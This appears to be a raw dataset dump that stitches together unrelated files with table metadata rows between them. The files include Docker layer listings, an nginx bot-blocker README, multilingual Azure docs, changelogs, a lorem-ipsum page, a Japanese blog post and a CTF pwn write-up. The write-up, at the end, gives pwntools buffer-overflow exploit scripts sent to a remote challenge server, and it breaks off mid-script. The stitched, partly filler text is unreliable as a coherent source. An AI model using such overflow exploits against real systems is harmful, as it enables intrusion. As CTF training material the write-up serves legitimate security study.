Last Modified: Tue, 26 May 2020 23:01:32 GMT
Size: 2.3 MB (2304504 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:ab1f35ad9e99020167fc244f6a3dadbffda06983ab46d10800245ab41bf2ac84`
Last Modified: Tue, 26 May 2020 23:01:26 GMT
Size: 280.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:8523a670e655d17a155615b3951701de0f60989ba5f6c9a1b1e4cb2a865a753a`
Last Modified: Tue, 26 May 2020 23:14:57 GMT
Size: 10.0 KB (10000 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:72c22edec5ca48a740ebda63d24dd23563aabe0e241a1fbe20bfcbc741229098`
Last Modified: Tue, 26 May 2020 23:14:57 GMT
Size: 813.9 KB (813875 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:f03b5fd0964a0e116ef2d303279b5c230acf1d728933e7ba68d18b4a75b0077f`
Last Modified: Tue, 26 May 2020 23:15:03 GMT
Size: 7.0 MB (7011508 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:aa064cdad6451867792ab3bdfa39d254d80637297c5b0aab5114b0b9cb1e1d43`
Last Modified: Tue, 26 May 2020 23:15:12 GMT
Size: 55.6 MB (55590027 bytes)
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
- `sha256:9f00de6606f32b294765f23eadc63cd1b6f198ce4bc18a86cd9cb38e7d0b0729`
Last Modified: Tue, 26 May 2020 23:15:12 GMT
Size: 547.0 B
MIME: application/vnd.docker.image.rootfs.diff.tar.gzip
| 85.4654 | 2,676 | 0.711628 | yue_Hant | 0.405252 |
61ba95a865d6581e512ab61c07c5fb9bc1970ad0 | 2,153 | md | Markdown | dump/public-vault-snapshot/etc/nginx/nginx-badbot-blocker/README.md | gandalfleal/twvault | 4950aa2317c938e06a8c8913f365666dd4400e0d | [
"MIT-0"
] | 1 | 2021-12-09T19:01:17.000Z | 2021-12-09T19:01:17.000Z | dump/public-vault-snapshot/etc/nginx/nginx-badbot-blocker/README.md | tylercamp/twvault | 4950aa2317c938e06a8c8913f365666dd4400e0d | [
"MIT-0"
] | null | null | null | dump/public-vault-snapshot/etc/nginx/nginx-badbot-blocker/README.md | tylercamp/twvault | 4950aa2317c938e06a8c8913f365666dd4400e0d | [
"MIT-0"
] | 3 | 2021-11-27T14:30:35.000Z | 2022-03-20T03:51:55.000Z | Nginx Bad Bot Blocker
===============
**223 (and growing) Nginx rules to block bad bots.**
Bad bots are defined as:
- E-mail harvesters
- Content scrapers
- Spam bots
- Vulnerability scanners
- Aggressive bots that provide little value
- Bots linked to viruses or malware
- Government surveillance bots
- ~~Russian search engine Yandex~~ (per user request, Yandex was removed)
- Chinese search engine Baidu
- Spamhaus IP list block
## Installation
If you have a bizarre or complicated setup, be sure to look everything
over before installing. However, for anyone with a fairly straightforward Nginx installation, this should work without any issues.
**Step 1.)** Clone the Nginx Bad Bot Blocker repository into your Nginx directory.
```
cd /etc/nginx
git clone https://github.com/mariusv/nginx-badbot-blocker.git
```
**Step 2.)** Edit `/etc/nginx/nginx.conf` and add the following at the end of the `http` block, before the closing `}`
```
##
# Nginx Bad Bot Blocker
##
include nginx-badbot-blocker/blacklist.conf;
include nginx-badbot-blocker/blockips.conf;
```
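For orientation, here is a minimal sketch of where those two `include` lines sit inside a complete `nginx.conf` (the `server` block and domain below are placeholders, and the paths assume the clone location from Step 1):

```nginx
events { }

http {
    # ...your existing http-level settings...

    ##
    # Nginx Bad Bot Blocker
    ##
    include nginx-badbot-blocker/blacklist.conf;
    include nginx-badbot-blocker/blockips.conf;

    # The includes belong at http level, outside any server block.
    server {
        listen 80;
        server_name example.com;  # placeholder
    }
}
```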
**Step 3.)** Run the following command to verify your Nginx configuration is valid. (*Note: You may need to prepend sudo to this command.*)
```
nginx -t
```
You should get an output that looks something like this:
```
nginx: the configuration file /etc/nginx/nginx.conf syntax is ok
nginx: configuration file /etc/nginx/nginx.conf test is successful
```
**Step 4.)** Reload Nginx and you're all set!
```
sudo service nginx reload
```
---
## Further information
### Baidu
Unless your website is written in Chinese, you probably don't
get any traffic from Baidu. Its bots mostly just waste bandwidth and consume resources.
### Bots Are Liars
Bots try to make themselves look like other software by disguising their
useragent. Their useragents may look harmless, perfectly legitimate even.
For example, `^Java` looks innocuous, but according to
[Project Honeypot](https://www.projecthoneypot.org/harvester_useragents.php),
it's actually one of the most dangerous.
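To make the mechanism concrete, here is a hypothetical sketch of the kind of user-agent rule such a blocker uses (the patterns and the `$bad_bot` variable name are illustrative only, not the actual contents of `blacklist.conf`):

```nginx
# Hypothetical example only -- the real rules live in blacklist.conf.
# A map like this belongs at http level:
map $http_user_agent $bad_bot {
    default       0;
    "~^Java"      1;  # the deceptively plain "^Java" agent mentioned above
    "~*harvest"   1;  # agents that advertise e-mail harvesting
}

server {
    listen 80;
    # 444 is nginx's special "close the connection without responding" code.
    if ($bad_bot) {
        return 444;
    }
}
```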
### Spamhaus IP Block
Blocks spam IP addresses from the Spamhaus Lasso Drop list. (I'll keep this list updated.)
***UPDATED 16/01/2018***
| 25.034884 | 139 | 0.743149 | eng_Latn | 0.984429 |
61bb40d5f3a9121b3269237324800a5bc2840d7e | 1,024 | md | Markdown | articles/active-directory/user-help/user-help-password-reset-overview.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/user-help/user-help-password-reset-overview.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/active-directory/user-help/user-help-password-reset-overview.md | JungYeolYang/azure-docs.zh-cn | afa9274e7d02ee4348ddb6ab81878b9ad1e52f52 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Reset password overview - Azure Active Directory | Microsoft Docs
description: Learn how to register for and reset your own password without administrator help.
services: active-directory
author: eross-msft
manager: daveba
ms.reviewer: sahenry
ms.service: active-directory
ms.workload: identity
ms.subservice: user-help
ms.topic: overview
ms.date: 07/30/2018
ms.author: lizross
ms.collection: M365-identity-device-management
ms.openlocfilehash: 5d03cdc8093651605839f813c264880b778167a6
ms.sourcegitcommit: 301128ea7d883d432720c64238b0d28ebe9aed59
ms.translationtype: HT
ms.contentlocale: zh-CN
ms.lasthandoff: 02/13/2019
ms.locfileid: "56165030"
---
# <a name="reset-password-overview"></a>Reset password overview
If you forgot your password, never received one from your company's support staff, or have been locked out of your account, you can use your security info and your mobile device to reset your password.
>[!Important]
>This content is intended for users. If you're an administrator, you can find more information about how to set up and manage your Azure Active Directory (Azure AD) environment in the [Azure Active Directory documentation](https://docs.microsoft.com/azure/active-directory).
|Article |Description |
|------|------------|
|[Register for self-service password reset](active-directory-passwords-reset-register.md)| Describes how to register so you can reset your own password.|
|[Reset your password](user-help-reset-password.md)| Describes how to reset your own password.|
| 31.030303 | 156 | 0.787109 | yue_Hant | 0.583657 |
61bb76f30dcc058ebfd6fe0e7d53063d7934a2bb | 160 | md | Markdown | docs/_snippets/flutter_firestore_todos_tutorial/user_repository_pubspec.yaml.md | gaabgonca/bloc | f3de2cf13a1802caf4cf6e8911cbd684082ef21e | [
"MIT"
] | 9,358 | 2018-10-08T03:59:10.000Z | 2022-03-31T21:20:30.000Z | docs/_snippets/flutter_firestore_todos_tutorial/user_repository_pubspec.yaml.md | gaabgonca/bloc | f3de2cf13a1802caf4cf6e8911cbd684082ef21e | [
"MIT"
] | 2,854 | 2018-10-09T09:30:19.000Z | 2022-03-31T21:07:11.000Z | docs/_snippets/flutter_firestore_todos_tutorial/user_repository_pubspec.yaml.md | gaabgonca/bloc | f3de2cf13a1802caf4cf6e8911cbd684082ef21e | [
"MIT"
] | 3,377 | 2018-10-14T21:37:37.000Z | 2022-03-31T10:08:35.000Z | ```yaml
name: user_repository
version: 1.0.0+1
environment:
sdk: ">=2.6.0 <3.0.0"
dependencies:
flutter:
sdk: flutter
firebase_auth: ^0.15.0+1
```
| 11.428571 | 26 | 0.63125 | eng_Latn | 0.35552 |
61bbe786091603779cb0c60f0b09d23818913f11 | 566 | md | Markdown | README.md | sergej-samsonow/amt | a94d99b864c9cbf11569175064391a8c20fd81c2 | [
"Apache-2.0"
] | null | null | null | README.md | sergej-samsonow/amt | a94d99b864c9cbf11569175064391a8c20fd81c2 | [
"Apache-2.0"
] | null | null | null | README.md | sergej-samsonow/amt | a94d99b864c9cbf11569175064391a8c20fd81c2 | [
"Apache-2.0"
] | null | null | null | # amt - application management tool
A collection of helper functions for developing and distributing your own
infrastructure script solutions.
## Install
Switch into your favorite installation directory, then:
`mkdir amt && cd amt && wget https://raw.githubusercontent.com/sergej-samsonow/amt/master/amt && chmod u+x amt`
This command install amt executable into you `installation directory/amt/amt`
Add you `amt` directory that contains `amt` exectuable to you path.
## Development
`amt-package` creates amt.tar.gz archive that contains amt script and core directory
| 43.538462 | 111 | 0.793286 | eng_Latn | 0.949358 |
61bc5bbfaf2b81d954b1b9182a38314bd7e46d3e | 19 | md | Markdown | README.md | Zchristian955/Data_Warehouse | 836c8d54a330aa4c5999eda406fbe167b10f64f0 | [
"MIT"
] | null | null | null | README.md | Zchristian955/Data_Warehouse | 836c8d54a330aa4c5999eda406fbe167b10f64f0 | [
"MIT"
] | null | null | null | README.md | Zchristian955/Data_Warehouse | 836c8d54a330aa4c5999eda406fbe167b10f64f0 | [
"MIT"
] | null | null | null | # Data_Warehouse
| 4.75 | 16 | 0.736842 | deu_Latn | 0.412333 |
61bcbca9fcf3ae55b245e2bb50084c2c6c6fffa9 | 459 | md | Markdown | content/book_1/002_suscipit_velit_interdum_dui/003_lobortis_adipiscing/004_augue_ligula_erat.md | wernerstrydom/sample-book | dbe00c6a6e2c9c227a6eb8955371d394b9398e48 | [
"MIT"
] | null | null | null | content/book_1/002_suscipit_velit_interdum_dui/003_lobortis_adipiscing/004_augue_ligula_erat.md | wernerstrydom/sample-book | dbe00c6a6e2c9c227a6eb8955371d394b9398e48 | [
"MIT"
] | null | null | null | content/book_1/002_suscipit_velit_interdum_dui/003_lobortis_adipiscing/004_augue_ligula_erat.md | wernerstrydom/sample-book | dbe00c6a6e2c9c227a6eb8955371d394b9398e48 | [
"MIT"
] | null | null | null | ### Augue ligula erat
Feugiat congue, ipsum vestibulum porta blandit commodo, leo, nunc, hac class nullam
Ultrices blandit, amet, sem, dictumst urna eu, fames augue pulvinar, convallis orci ligula
Fusce inceptos mollis mi, urna, maecenas eleifend, tempor, lacinia. Aenean orci, proin euismod diam luctus
Sit pharetra ut euismod vehicula dictum imperdiet
Dui eget laoreet. Fringilla, blandit, nullam conubia dui vitae auctor. Leo, finibus tincidunt non
| 32.785714 | 106 | 0.793028 | cat_Latn | 0.237357 |
61bcbeec5f0742eb0e87703187729f414b30b0b2 | 2,749 | md | Markdown | CHANGELOG.md | shamork/Metrics.NET | dee08fd67b910ca717ae12048d0d99fd37f0ceed | [
"Apache-2.0"
] | 664 | 2015-01-02T12:49:54.000Z | 2022-02-27T11:08:24.000Z | CHANGELOG.md | shamork/Metrics.NET | dee08fd67b910ca717ae12048d0d99fd37f0ceed | [
"Apache-2.0"
] | 80 | 2015-01-12T21:02:12.000Z | 2019-12-07T21:25:44.000Z | CHANGELOG.md | shamork/Metrics.NET | dee08fd67b910ca717ae12048d0d99fd37f0ceed | [
"Apache-2.0"
] | 191 | 2015-01-13T20:51:12.000Z | 2021-09-02T20:33:20.000Z | ###0.2.16 / 2015-03-19
* retry starting httplistener on failure (better support for asp.net hosting where app pools are recycled)
###0.2.15 / 2015-03-03
* fix disposal of httplistener (@nkot)
* Added Process CPU usage into app counters (@o-mdr)
* resharper cleanup
* update dependencies
###0.2.14 / 2014-12-15
* fix possible issue when metrics are disabled and timer returns null TimerContext
###0.2.13 / 2014-12-14
* fix error when trying to globally disable metrics
* first elasticsearch bits
###0.2.11 / 2014-11-16
* graphite adapter (early bits, might have issues)
* refactor & cleanup reporting infra
###0.2.10 / 2014-11-06
* fix error logging for not found performance counters
###0.2.9 / 2014-11-05
* record active sessions for timers
###0.2.8 / 2014-10-29
* handle access issues for perf counters
###0.2.7 / 2014-10-28
* preparations for out-of-process metrics
###0.2.6 / 2014-10-17
* fix http listener prefix handling
###0.2.5 / 2014-10-12
* JSON metrics refactor
* remote metrics
###0.2.4 / 2014-10-07
* JSON version
* added environment
* various fixes
###0.2.3 / 2014-10-01
* add support for set counter & set meters [details](https://github.com/etishor/Metrics.NET/issues/21)
* cleanup owin adapter
* better & more resilient error handling
###0.2.2 / 2014-09-27
* add support for tagging metrics (not yet used in reports or visualization)
* add support for supplying a string user value to histograms & timers for tracking min / max / last values
* tests cleanup, some refactoring
###0.2.1 / 2014-09-25
* port latest changes from original metrics lib
* port optimization from ExponentiallyDecayingReservoir (https://github.com/etishor/Metrics.NET/commit/1caa9d01c16ff63504612d64771d52e9d7d9de5e)
* other minor optimizations
* add gauges for thread pool stats
###0.2.0 / 2014-09-20
* implement metrics contexts (and child contexts)
* make config more friendly
* most used config options are now set by default
* add logging based on liblog (no fixed dependency - automatically wire into existing logging framework)
* update nancy & owin adapters to use contexts
* add some app.config settings to ease configuration
###0.1.11 / 2014-08-18
* update to latest visualization app (fixes checkboxes being outside dropdown)
* fix json caching in IE
* allow defining custom names for metric registry
###0.1.10 / 2014-07-30
* fix json formatting (thanks to Evgeniy Kucheruk @kpoxa)
###0.1.9 / 2014-07-04
* make reporting more extensible
###0.1.8
* remove support for .NET 4.0
###0.1.6
* for histograms also store last value
* refactor configuration ( use Metric.Config.With...() )
* add option to completely disable metrics Metric.Config.CompletelyDisableMetrics() (useful for measuring metrics impact)
* simplify health checks
---
layout: page
title: Marcus Peh's Project Portfolio Page
---
### Project: Around the World in $80
Around the World in $80 is a desktop application that splits bills between different contacts. The user interacts with it using a CLI, and it has a GUI created with JavaFX. It is written in Java, and has about 10 kLoC.
Given below are my contributions to the project. [RepoSense link](https://nus-cs2103-ay2122s1.github.io/tp-dashboard/?search=marcuspeh&sort=groupTitle&sortWithin=title&timeframe=commit&mergegroup=&groupSelect=groupByRepos&breakdown=true&checkedFileTypes=docs~functional-code~test-code~other&since=2021-09-17)
### Features
* **New Feature**: Added the ability to change between contacts and groups view.
* What it does: Allows the user to see groups / contacts with a command.
* Justification: This feature is crucial as the user should be able to view the groups and contacts created.
  * Highlights: This implementation added a new command `groups` to see all groups. It renames the command `list` to `contacts`, which allows the user to see all contacts.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/121)
* **New Feature**: Added the ability to find groups.
  * What it does: Allows the user to find groups with a command.
  * Justification: This feature will allow the user to check if a group has been created and the details of the group.
  * Highlight: This implementation added a new command `findgroups` to find groups. It also changes the view from `contacts` to `groups`.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/163)
* **New Feature**: Added the ability to see the total spending per person in a trip
* What it does: Allows the user to find their expenses in a trip.
* Justification: This feature will allow the user to track their expenses and cut down spending if needed.
  * Highlight: This implementation added a new command `transactionsummary` to see expenses.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/206)
* **Update**: Updated the data stored in `Expense` and `Group`.
  * What it does: Allows for the splitting of expenses between users of a group. Updates the `Expense` command to be more straightforward.
  * Justification: The data stored is crucial in keeping track of expenses. A clear and straightforward way of storing expenses is necessary to prevent bugs.
  * Highlight: This update makes adding expenses more straightforward and splits the expenses of users properly.
* RepoSense: [link](https://app.codecov.io/gh/AY2122S1-CS2103T-F13-1/tp/compare/245)
* **Enhancements to existing features**:
* Updated the UI interface layout. [\#121](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/121)
  * Added buttons to toggle between the contacts page and the groups page [\#121](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/121)
### Bug Fixes
* **severity.HIGH** Edit person does not update groups and expenses. [\#158](https://github.com/AY2122S1-CS2103T-F13-1/tp/issues/153)
  * What happened: The command `addPerson` did not replace the instance of the old person in groups and expenses.
* Pull request: [\#158](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/158)
* **severity.HIGH** Commands for modifying groups will result in the entire group's expense to be wiped. [\#270](https://github.com/AY2122S1-CS2103T-F13-1/tp/issues/270)
  * What happened: Expenses were not brought from the old instance to the new instance of that specific group.
* Pull request: [\#269](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/269), [\#273](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/273)
* **severity.MED** JSON files load even when contacts' phone numbers are only partially changed, i.e. not all phone numbers of a contact are changed.
  * What happened: The check when loading the file was based only on the name of the contact and not the entire contact info.
* Pull request: [\#425](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/425)
### Others
* **Project management**
* Managed releases: [v1.2](https://github.com/AY2122S1-CS2103T-F13-1/tp/releases/tag/v1.2)
* **User Guide**:
* Added user guide for the features `groups`, `expenses`, `findgroups` and `transactionsummary`.
* Added FAQs.
* **Developer Guide**:
* Updated UI segment in Design with class diagram and explanation.
* Added implementation and design consideration for user interface.
* Added implementation, test cases and use cases for `findgroups`, `transactionsummary`.
* Added use cases for `view groups`, `find person` and `view expenses`.
* **Testing**:
  * Examples of PRs that increase code coverage: [\#352](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/352), [\#353](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/353), [\#356](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/356)
* **Community**:
* Maintaining the issue tracker
* PRs reviewed (with non-trivial review comments): [\#113](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/113), [\#116](https://github.com/AY2122S1-CS2103T-F13-1/tp/pull/116)
* Contributed to forum discussions (examples: [1](https://github.com/nus-cs2103-AY2122S1/forum/issues/328), [2](https://github.com/nus-cs2103-AY2122S1/forum/issues/9), [3](https://github.com/nus-cs2103-AY2122S1/forum/issues/11))
* Reported bugs and suggestions for other teams in the class (examples: [1 (F13-3)](https://github.com/AY2122S1-CS2103T-F13-3/tp/issues/332), [2 (F13-3)](https://github.com/AY2122S1-CS2103T-F13-3/tp/issues/328), [3 (W16-2)](https://github.com/AY2122S1-CS2103T-W16-2/tp/issues/216), [4 (W16-2)](https://github.com/AY2122S1-CS2103T-W16-2/tp/issues/224))
---
title: Manage user access with access reviews - Azure AD
description: Learn how to manage user access, such as group membership or assignment to an application, with Azure Active Directory access reviews
services: active-directory
documentationcenter: ''
author: ajburnle
manager: daveba
editor: markwahl-msft
ms.service: active-directory
ms.workload: identity
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: conceptual
ms.subservice: compliance
ms.date: 06/21/2018
ms.author: ajburnle
ms.reviewer: mwahl
ms.collection: M365-identity-device-management
ms.openlocfilehash: cc12b4cb7e97a0808405baebc64ca83cdb742bf1
ms.sourcegitcommit: f28ebb95ae9aaaff3f87d8388a09b41e0b3445b5
ms.translationtype: HT
ms.contentlocale: es-ES
ms.lasthandoff: 03/29/2021
ms.locfileid: "94696955"
---
# <a name="manage-user-access-with-azure-ad-access-reviews"></a>Manage user access with Azure AD access reviews
With Azure Active Directory (Azure AD), you can make sure that users have the appropriate access. You can ask the users themselves, or whoever you designate, to participate in an access review and recertify (or attest) to users' access. The reviewers can give their approval for each user's continued need for access, based on suggestions from Azure AD. When an access review is finished, you can then make changes and remove access from users who no longer need it.
> [!NOTE]
> If you want to review only guest users' access, and not the access of all types of users, see [Manage guest access with Azure AD access reviews](manage-guest-access-with-access-reviews.md). If you want to review users' membership in administrative roles such as Global Administrator, see [Start an access review in Azure AD Privileged Identity Management](../privileged-identity-management/pim-how-to-start-security-review.md).
## <a name="prerequisites"></a>Prerequisites
- Azure AD Premium P2
For more information, see [License requirements](access-reviews-overview.md#license-requirements).
## <a name="create-and-perform-an-access-review"></a>Create and perform an access review
You can have one or more users as reviewers in an access review.
1. Select a group in Azure AD that has one or more members. Or select an application connected to Azure AD that has one or more users assigned to it.
2. Decide whether to have each user review their own access, or to have one or more users review everyone's access.
3. In one of the following roles: a Global Administrator, a User Administrator, or an M365 or AAD security group owner (preview) of the group to be reviewed, go to the [Identity Governance page](https://portal.azure.com/#blade/Microsoft_AAD_ERM/DashboardBlade/).
4. Create the access review. For more information, see [Create an access review of groups or applications](create-access-review.md).
5. When the access review starts, ask the reviewers to give input. By default, they each receive an email from Azure AD with a link to the access panel, where they can [review access to groups or applications](perform-access-review.md).
6. If the reviewers haven't given input, you can ask Azure AD to send them a reminder. By default, Azure AD automatically sends a reminder halfway to the end date to reviewers who haven't responded.
7. After the reviewers give input, stop the access review and apply the changes. For more information, see [Complete an access review of groups or applications](complete-access-review.md).
## <a name="next-steps"></a>Next steps
[Create an access review of groups or applications](create-access-review.md)
# array-find
[](https://travis-ci.org/stefanduberg/array-find)
**ES 2015 `Array.find` ponyfill.**
**Ponyfill: A polyfill that doesn't overwrite the native method.**
Find array elements. Executes a callback for each element, and returns the first element for which the callback returns a truthy value.
## Usage
```javascript
var find = require('array-find');
var numbers = [1, 2, 3, 4];
find(numbers, function (element, index, array) {
return element === 2;
});
// => 2
var robots = [{name: 'Flexo'}, {name: 'Bender'}, {name: 'Buster'}];
find(robots, function (robot, index, array) {
return robot.name === 'Bender';
});
// => {name: 'Bender'}
find(robots, function (robot, index, array) {
return robot.name === 'Fry';
});
// => undefined
```
Optionally pass in an object as the third argument to use as `this` when executing the callback.
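For illustration, here is a sketch of that third-argument behavior. The `find` below is a minimal inline stand-in with the documented signature, used only so the example is self-contained; in practice you would call the installed module the same way:

```javascript
// Minimal stand-in with array-find's documented signature.
function find(array, callback, context) {
  for (var i = 0; i < array.length; i++) {
    if (callback.call(context, array[i], i, array)) {
      return array[i];
    }
  }
  return undefined;
}

var result = find(['Flexo', 'Bender', 'Buster'], function (name) {
  return name === this.wanted; // `this` is the context object passed below
}, {wanted: 'Bender'});
// => 'Bender'
```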
## Install
```bash
$ npm install array-find
```
## License
MIT
---
title: Design your first Azure SQL database - C# | Microsoft Docs
description: Learn how to design your first Azure SQL database and connect to it with a C# program using ADO.NET.
services: sql-database
ms.service: sql-database
ms.subservice: development
ms.custom: ''
ms.devlang: ''
ms.topic: tutorial
author: MightyPen
ms.author: genemi
ms.reviewer: carlrab
manager: craigg-msft
ms.date: 06/07/2018
ms.openlocfilehash: 65a9bde6fa086dc56809df9619ceee1c5b417e31
ms.sourcegitcommit: cc4fdd6f0f12b44c244abc7f6bc4b181a2d05302
ms.translationtype: HT
ms.contentlocale: ja-JP
ms.lasthandoff: 09/25/2018
ms.locfileid: "47063303"
---
# <a name="design-an-azure-sql-database-and-connect-with-cx23-and-adonet"></a>Design an Azure SQL database and connect with C# and ADO.NET
Azure SQL Database is a relational database-as-a-service (DBaaS) in the Microsoft Cloud (Azure). In this tutorial, you learn how to use the Azure portal, ADO.NET, and Visual Studio to:
> [!div class="checklist"]
> * Create a database in the Azure portal
> * Set up a server-level firewall rule in the Azure portal
> * Connect to the database with ADO.NET and Visual Studio
> * Create a table with ADO.NET
> * Insert, update, and delete data with ADO.NET
> * Query data with ADO.NET
If you don't have an Azure subscription, [create a free account](https://azure.microsoft.com/free/) before you begin.
## <a name="prerequisites"></a>Prerequisites
An installation of [Visual Studio Community 2017, Visual Studio Professional 2017, or Visual Studio Enterprise 2017](https://www.visualstudio.com/downloads/).
<!-- The following included .md, sql-database-tutorial-portal-create-firewall-connection-1.md, is long.
And it starts with a ## H2.
-->
[!INCLUDE [sql-database-tutorial-portal-create-firewall-connection-1](../../includes/sql-database-tutorial-portal-create-firewall-connection-1.md)]
<!-- The following included .md, sql-database-csharp-adonet-create-query-2.md, is long.
And it starts with a ## H2.
-->
[!INCLUDE [sql-database-csharp-adonet-create-query-2](../../includes/sql-database-csharp-adonet-create-query-2.md)]
## <a name="next-steps"></a>Next steps
In this tutorial, you learned basic database tasks such as creating a database and tables, loading and querying data, and restoring the database to an earlier point in time. You learned how to:
> [!div class="checklist"]
> * Create a database
> * Set up a firewall rule
> * Connect to SQL Database with [Visual Studio and C#](sql-database-connect-query-dotnet-visual-studio.md)
> * Create a table
> * Insert, update, and delete data
> * Query data
Advance to the next tutorial to learn how to migrate your data.
> [!div class="nextstepaction"]
> [Migrate your SQL Server database to Azure SQL Database](sql-database-migrate-your-sql-server-database.md)
---
title: Attending the JTPA Silicon Valley Conference 2009
date: Mon, 15 Dec 2008 15:00:00 +0000
author: Hiro Fukami
layout: post
permalink: /2008/12/15/jtpa-2009-2/
tumblr_hirofukami_permalink:
  - http://hirofukami.tumblr.com/post/29609206563/jtpa-2009
  - http://hirofukami.tumblr.com/post/29609206563/jtpa-2009
  - http://hirofukami.tumblr.com/post/29609206563/jtpa-2009
tumblr_hirofukami_id:
  - 29609206563
  - 29609206563
  - 29609206563
original_post_id:
  - 298
  - 298
  - 298
categories:
  - Business
tags:
  - JTPA
---
<div class="section">
  <p>
    <a href="http://www.jtpa.org/event/svtour/" target="_blank"><img alt="Silicon Valley Conference" src="http://www.jtpa.org/images/svconf2009.png?resize=175%2C144" border="0" data-recalc-dims="1" /></a>
  </p>
  <p>
    I'm writing this rather late, but I have signed up for the JTPA Silicon Valley Conference 2009, to be held in Silicon Valley on March 21 next year.
  </p>
  <p>
    Up through the previous editions it was a tour with only a small number of participants, but this time it is a full-day conference where everyone gathers locally; beyond that, you are expected to make your own appointments and arrange your own company visits. In other words, the format counts on the participants' own initiative.
  </p>
  <p>
    A <a href="http://www.facebook.com/home.php?#/group.php?gid=25208215005" target="_blank">group</a> has already been set up on Facebook, where the organizers and participants recruit people for company visits and coordinate dates. I also wanted to join the <a href="http://d.hatena.ne.jp/umedamochio/20081104/p1" target="_blank">meeting with Mochio Umeda</a>, but I couldn't find anyone to go with, so I'm very grateful that it was <a href="http://jtpa09.g.hatena.ne.jp/" target="_blank">coordinated</a> through the Facebook group.
  </p>
  <p>
    I believe Silicon Valley has a refined environment for building internet services, and I wanted to learn as early as possible what kind of people are there, what they are thinking about, and at what pace they build things.
  </p>
  <p>
    I had been keeping an eye on JTPA since last year as one such opportunity, and since by next March I will be free to use my time as I like, I saw this as a perfect chance and signed up without hesitation.
  </p>
  <p>
    The talk with Mr. Umeda, building connections with the other participants, and the experience of actually seeing things for myself: I'm sure all of it will be a good stimulus and will work in my favor from here on.
  </p>
  <p>
    There is still some time until the day, and I have preparations to make, like booking a flight and getting an international driver's license, but above all I want to be able to explain the core of what I am working on.
  </p>
  <p>
    Also, if anyone else has applied alone like me and is planning to travel from Japan to Silicon Valley, let's go together. Please contact me by whatever means is convenient. I'm also a member of the Facebook group as Hironobu Fukami.
  </p>
</div>
---
title: TMUCTF 2021 Pwn
tags: [tmuctf, ctf, writeup]
description: This is an exploit writeup for pwn challenges from tmuctf
---
# Tasks
* warmup
* babypwn
* areyouadmin
* canary
* security code
* fakesurvey
>You can download the challenges and exploits files <a href="https://github.com/kirimoe/tmuctf2021">from here</a>
# warmup
<img src="/assets/img/tmu/warmup.png">
This is an easy challenge all you have to do is to modify a varible on stack and
set it to non-zero send some A's to binary and you will get the flag.
<img src="/assets/img/tmu/warmup_sol.png">
Flag is <span style="color:red">`TMUCTF{n0w_y0u_4r3_w4rm3d_up}`</span>
# babypwn
<img src="/assets/img/tmu/babypwn.png">
This is a classical buffer overflow challenge with no mitigations involved. All you have to do is overwrite the return address with the address of the function <span style="color:red">`wow`</span> and you will get the flag.
```python
from pwn import *
p = ELF("./babypwn")
r = remote("194.5.207.56",7010)
offset = 0x28
payload = b"A"*offset
payload += p64(p.symbols['wow'])
r.recv()
r.sendline(payload)
print(r.recvall())
```
<br>
<img src="/assets/img/tmu/babypwn_sol.png">
Flag is <span style="color:red">`TMUCTF{w0w!_y0u_c0uld_f1nd_7h3_w0w!}`</span>
# areyouadmin
<img src="/assets/img/tmu/areyouadmin.png">
This was an interesting challenge because it was the first time I used <font color="aqua">z3</font> with a pwn challenge. Okay so the challenge was fairly easy: it just asks for a username and password and that's it.
The username is <span style="color:red">`AlexTheUser`</span> and the password is <span style="color:red">`4l3x7h3p455w0rd`</span>; you can easily find them using the `strings` command.
But it will only give you the flag if you bypass certain conditions like these:
<img src="/assets/img/tmu/condition.png">
These are the mathematical conditions where you have to guess the variables. This is where <font color="aqua">z3</font> comes into play. <font color="aqua">z3</font>, or any SAT solver, takes a set of conditions and gives you exact numbers that satisfy them, like:
```
a + b = 5
a - b = 1
Then z3 will solve this for you and will give you the exact value for a and b
```
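To make the idea concrete, here is that toy system solved by brute force in plain Python; this is, in spirit, what we are about to ask z3 to do for the real (much larger) system:

```python
# Brute-force the toy system: a + b = 5 and a - b = 1.
solution = next(
    (a, b)
    for a in range(10)
    for b in range(10)
    if a + b == 5 and a - b == 1
)
print(solution)  # -> (3, 2)
```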
The variables are locations on the stack set to 0, so all you have to do is overwrite them with the correct values and you will get the flag. For this you can use either the username or the password field; both are vulnerable to buffer overflow.
```python
from pwn import *
from z3 import *
a,b,c,d,e = Int('a'),Int('b'),Int('c'),Int('d'),Int('e')
def val():
s = Solver()
s.add((a * b) + c == 0x253f)
s.add((b * c) + d == 0x37a2)
s.add((c * d) + e == 0x16d3)
s.add((d * e) + a == 0x1bc9)
s.add((e * a) + b == 0x703f)
s.check()
return s.model()
l = val()
flag = False
offset = 0x60 - 0x14
username = b"AlexTheUser\x00"
password = b"4l3x7h3p455w0rd"
payload = b""
payload += username
payload += b"A" * (offset - len(username))
payload += p32(l[e].as_long())
payload += p32(l[d].as_long())
payload += p32(l[c].as_long())
payload += p32(l[b].as_long())
payload += p32(l[a].as_long())
payload2 = b""
payload2 += password
if flag:
